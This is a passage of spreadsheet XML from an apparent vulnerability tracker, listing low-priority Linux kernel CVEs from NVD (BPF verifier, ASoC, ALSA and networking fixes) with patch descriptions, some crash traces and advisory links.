      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr"/>
      <c r="S680" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bcmasp: fix tx_spb_ring_full() checking same slot cnt times
The loop initialised next_index from intf-&gt;tx_spb_index on every
iteration, so incr_ring() always produced the same result and only
one slot was ever tested.  Move the initialisation before the loop
so each iteration advances next_index and the function correctly
checks that cnt consecutive descriptor slots are available before
allowing a new transmission.</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98051</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98053</t>
        </is>
      </c>
      <c r="D681" s="5" t="inlineStr"/>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="inlineStr"/>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr"/>
      <c r="S681" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: avs: Refactor and fix init_config access
Existing code accesses enties found in -&gt;init_configs array through
indexes that are part of -&gt;config_ids array.  Those two are limited by:
-&gt;num_init_configs and -&gt;num_config_ids respectively.  Using ID larger
or equal to -&gt;num_init_configs leads to out-of-bounds access:
avs_path_module_send_init_configs()
loop:
	(...) &amp;acomp-&gt;tplg-&gt;init_configs[ids[i]]
					^ out-of-bounds candidate
Rather than adding another if-statement, refactor the code.  There is no
need to store the IDs, have a list of pointers to actual config-entries
instead.  As the verification of -&gt;init_config entries does not differ from
verification of other types that are part of the topology.c file, simply
reuse the code.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98053</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98054</t>
        </is>
      </c>
      <c r="D682" s="5" t="inlineStr"/>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="inlineStr"/>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr"/>
      <c r="S682" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: avs: Fix unbalanced module reference count
strace_open() invokes try_module_get() which on success takes
the module reference.  If any follow up operation causes
strace_open() to fail, the refcount shall be put down.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98054</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98055</t>
        </is>
      </c>
      <c r="D683" s="5" t="inlineStr"/>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="inlineStr"/>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr"/>
      <c r="S683" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: avs: Clean up the bus when fetching ML caps fails
snd_hdac_ext_bus_get_ml_capabilities() may fail and its return code
shall be checked and accounted for. Address the issue by updating the
error-path for avs_pci_probe().
At the same time, if the function in question succeeds but the next part
of avs_pci_probe() fails, the hlink list shall be cleaned up before
leaving the scope.</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98055</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98057</t>
        </is>
      </c>
      <c r="D684" s="5" t="inlineStr"/>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr"/>
      <c r="S684" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Add checking nr_subbufs to persistent ring buffer validation
Sashiko reported that the code was using meta-&gt;nr_subbufs without making
sure that it matched the nr_pages + 1 on data that was assuming the two
were the same.
Add a check to the persistent ring buffer validation code to make sure
that the saved nr_subbufs matches what we expect.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98057</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98058</t>
        </is>
      </c>
      <c r="D685" s="5" t="inlineStr"/>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr"/>
      <c r="S685" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark syscall helpers as sleepable
bpf_sys_bpf() executes the bpf(2) syscall body, which can take mutexes,
allocate with GFP_KERNEL, and wait for an RCU grace period.
bpf_sys_close() reaches close_fd() and filp_close(), which can sleep as
well.
Both helpers are limited to BPF_PROG_TYPE_SYSCALL, whose main program is
sleepable. That does not make every callback sleepable: a syscall program
can register a bpf_timer callback, and the verifier checks that callback
in a non-sleepable context while retaining the syscall helper set.
Without .might_sleep on the prototypes, such a callback can invoke
bpf_sys_bpf() from hrtimer softirq context and trigger a
scheduling-while-atomic failure. bpf_sys_close() is exposed through the
same missing context check.
Set .might_sleep on both prototypes so the existing helper-context check
rejects them from timer callbacks and other atomic regions. Calls from the
sleepable main body remain valid.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98058</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98059</t>
        </is>
      </c>
      <c r="D686" s="5" t="inlineStr"/>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="inlineStr"/>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr"/>
      <c r="S686" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark sched_process_wait argument as nullable
do_wait() passes wo-&gt;wo_pid to the sched_process_wait tracepoint.
kernel_wait4() leaves wo_pid NULL for wait4(-1), and
kernel_waitid_prepare() does likewise for waitid(P_ALL).
btf_ctx_access() currently types argument 0 as PTR_TO_BTF_ID |
PTR_TRUSTED. Without PTR_MAYBE_NULL, the verifier accepts an unchecked
dereference. Trusted pointer loads have no fault protection, so a wait for
any child can then cause a NULL pointer dereference in JITed BPF code.
Add sched_process_wait to raw_tp_null_args[] with argument 0 marked
nullable. The verifier rejects an unchecked dereference while preserving
access after the program checks the pointer for NULL.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98059</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98060</t>
        </is>
      </c>
      <c r="D687" s="5" t="inlineStr"/>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="inlineStr"/>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr"/>
      <c r="S687" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject resilient lock operations in rbtree callbacks
__bpf_rbtree_add() keeps parent and link pointers live across calls to the
program-supplied comparison callback. The verifier therefore requires the
root's lock to remain held throughout the callback.
The helper path enforces this rule for bpf_spin_lock() and
bpf_spin_unlock(), but the resilient lock kfunc argument path does not.
Since resilient locks may protect BPF rbtree roots, a callback can release
the root lock and let another CPU remove and free the node referenced by
the in-progress tree walk. The walk then resumes using freed pointers.
Reject resilient lock kfuncs in an rbtree comparison callback, matching
the existing policy for the spin lock helpers. Resilient-lock-protected
trees remain valid when their comparison callbacks leave lock state alone.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98060</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98061</t>
        </is>
      </c>
      <c r="D688" s="5" t="inlineStr"/>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="inlineStr"/>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr"/>
      <c r="S688" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject tail calls directly from callback frames
A tail call from a non-zero frame is modeled as a return from that frame.
The verifier makes R0 unknown and calls prepare_func_exit() for the taken
branch.
When the current frame is a synchronous callback, prepare_func_exit()
enforces the callback return-value contract and marks R0 precise. Since the
tail-call path synthesized R0 rather than deriving it from an instruction,
precision backtracking reaches the callback-calling instruction with R0
still requested and triggers the "callback unexpected regs" verifier bug.
A CAP_BPF task can therefore cause a WARN and an -EFAULT BPF_PROG_LOAD.
Tail calls reachable from callbacks are already rejected later by
check_max_stack_depth(). Reject a tail call made directly by a callback
before constructing the inconsistent return state, using the existing
diagnostic. Tail calls from ordinary subprograms keep their current
behavior.</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98061</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98062</t>
        </is>
      </c>
      <c r="D689" s="5" t="inlineStr"/>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="inlineStr"/>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr"/>
      <c r="S689" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark signal tracepoint siginfo arguments as scalar
The signal_generate and signal_deliver tracepoints declare their info
argument as a struct kernel_siginfo pointer. btf_ctx_access() therefore
treats it as a trusted pointer for tp_btf programs.
Signal delivery also uses SEND_SIG_NOINFO and SEND_SIG_PRIV as special
values for this argument. Those values are zero and one respectively,
and are not pointers. A tp_btf program can currently dereference either
value and fault the kernel. In particular, signal_generate can run from
timer interrupt context, turning the fault into a kernel panic.
Record both tracepoints in raw_tp_null_args[] and mark argument one as
a non-pointer. This preserves scalar access to the cookie while rejecting
direct and helper-mediated pointer use. Merely marking it nullable would
not suffice because SEND_SIG_PRIV is nonzero.</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98062</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98063</t>
        </is>
      </c>
      <c r="D690" s="5" t="inlineStr"/>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="inlineStr"/>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr"/>
      <c r="S690" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix NULL-ptr-deref in btf_var_show()
btf_var_show() calls btf_type_id_resolve() unconditionally, which
dereferences btf-&gt;resolved_ids. That is NULL for a base BTF - e.g. the
vmlinux BTF that bpf_snprintf_btf() renders against - since base BTF is
not resolved during parsing. btf_modifier_show() guards this with
'if (btf-&gt;resolved_ids)', but btf_var_show() does not.
A BPF program that passes the type_id of a BTF_KIND_VAR from the vmlinux
BTF to bpf_snprintf_btf() thus NULL-derefs:
KASAN: probably user-memory-access in range [0x46638-0x4663f]
RIP: 0010:btf_var_show (kernel/bpf/btf.c:2929)
Call Trace:
 &lt;TASK&gt;
 btf_type_show (kernel/bpf/btf.c:8259)
 btf_type_snprintf_show (kernel/bpf/btf.c:8329)
 bpf_snprintf_btf (kernel/trace/bpf_trace.c:1047)
 bpf_prog_test_run_raw_tp (net/bpf/test_run.c:829)
 __sys_bpf (kernel/bpf/syscall.c:4804)
 do_syscall_64 (arch/x86/entry/syscall_64.c:84)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;
Resolve the var's type directly with btf_type_skip_modifiers() when
resolved_ids is NULL, mirroring btf_modifier_show().</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98063</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98064</t>
        </is>
      </c>
      <c r="D691" s="5" t="inlineStr"/>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="inlineStr"/>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr"/>
      <c r="S691" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix NULL-ptr-deref when showing a void BTF type
btf_modifier_show() resolves the modifier and then calls
btf_type_ops(t)-&gt;show() unconditionally. For the void type (type_id 0,
BTF_KIND_UNKN) kind_ops[] has no entry, so -&gt;show is NULL.
A "const void" (a modifier resolving to void) cannot be a map key or
value - map_check_btf() rejects it because void has no size - so the map
dump path does not reach it. But bpf_snprintf_btf() takes a type_id
straight from the BPF program, and passing such a "const void" from the
vmlinux BTF NULL-derefs:
KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]
RIP: 0010:btf_modifier_show (kernel/bpf/btf.c:2914)
Call Trace:
 &lt;TASK&gt;
 btf_type_show (kernel/bpf/btf.c:8251)
 btf_type_snprintf_show (kernel/bpf/btf.c:8321)
 bpf_snprintf_btf (kernel/trace/bpf_trace.c:1047)
 bpf_prog_test_run_raw_tp (net/bpf/test_run.c:829)
 __sys_bpf (kernel/bpf/syscall.c:4804)
 do_syscall_64 (arch/x86/entry/syscall_64.c:94)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;
Fall back to btf_df_show() when the resolved type has no show op; it
emits the "&lt;unsupported kind:N&gt;" placeholder already used for kinds like
FWD and FUNC. bpf_snprintf_btf() then returns the length as usual.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98064</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98065</t>
        </is>
      </c>
      <c r="D692" s="5" t="inlineStr"/>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="inlineStr"/>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr"/>
      <c r="S692" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject key-less BTF for hash maps
map_check_btf() allows a key-less BTF (btf_key_type_id == 0) only for
maps that have a -&gt;map_check_btf callback, and leaves the actual
decision to that callback. Hash maps used to have no -&gt;map_check_btf,
so a key-less BTF was rejected outright.
That changed when htab and rhtab gained a -&gt;map_check_btf to register a
dtor - htab in commit 1df97a7453ee ("bpf: Register dtor for freeing
special fields") and rhtab in commit 6905f8601298 ("bpf: Allow special
fields in resizable hashtab"). Neither looks at the key, so a key-less
hash map now passes map_check_btf() and gets created. Reading it back
through bpffs feeds the key type_id 0 into btf_type_seq_show();
btf_type_by_id() returns the void type, kind_ops[BTF_KIND_UNKN] is NULL,
and btf_type_show() dereferences it:
RIP: 0010:btf_type_show+0x223/0x2e0 kernel/bpf/btf.c:8232
RSP: 0018:ffffc9000399f868 EFLAGS: 00010206
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000005 RSI: 0000000000000000 RDI: 0000000000000028
RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000
R10: ffffc9000399f970 R11: 0000000000000001 R12: ffffffff9b96b140
R13: ffffc9000399f8e0 R14: ffff88803d393c00 R15: 0000000000000003
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000000 CR3: 000000003d213000 CR4: 0000000000352ef0
DR0: 0000000039ae8f55 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Call Trace:
 &lt;TASK&gt;
 btf_type_seq_show_flags+0xca/0x120 kernel/bpf/btf.c:8250
 htab_map_seq_show_elem+0x12e/0x350 kernel/bpf/hashtab.c:1669
 map_seq_show+0x13d/0x1e0 kernel/bpf/inode.c:293
 traverse.part.0.constprop.0+0x107/0x650 fs/seq_file.c:112
 traverse fs/seq_file.c:99 [inline]
 seq_read_iter+0x93f/0x1270 fs/seq_file.c:196
 seq_read+0x344/0x4d0 fs/seq_file.c:163
 vfs_read+0x1e4/0xb40 fs/read_write.c:572
 ksys_pread64 fs/read_write.c:764 [inline]
 __do_sys_pread64 fs/read_write.c:772 [inline]
 __se_sys_pread64 fs/read_write.c:769 [inline]
 __x64_sys_pread64+0x1eb/0x250 fs/read_write.c:769
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x123/0x790 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
Reject a key-less BTF in htab_map_check_btf() and rhtab_map_check_btf(),
restoring the previous behavior.</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98065</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98066</t>
        </is>
      </c>
      <c r="D693" s="5" t="inlineStr"/>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr"/>
      <c r="S693" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: caiaq: Fix potential double-free at error path
The fix for caiaq driver's resource management to handle the errors
tries to release the resources in a common destructor call, but as a
sashiko review for another patch suggested, some of the audio
resources such as URBs have been already freed, and this may lead to a
double-free.
For addressing the double-free, call the common destructor function
from each place, and assure that the resource pointers get cleared.</t>
        </is>
      </c>
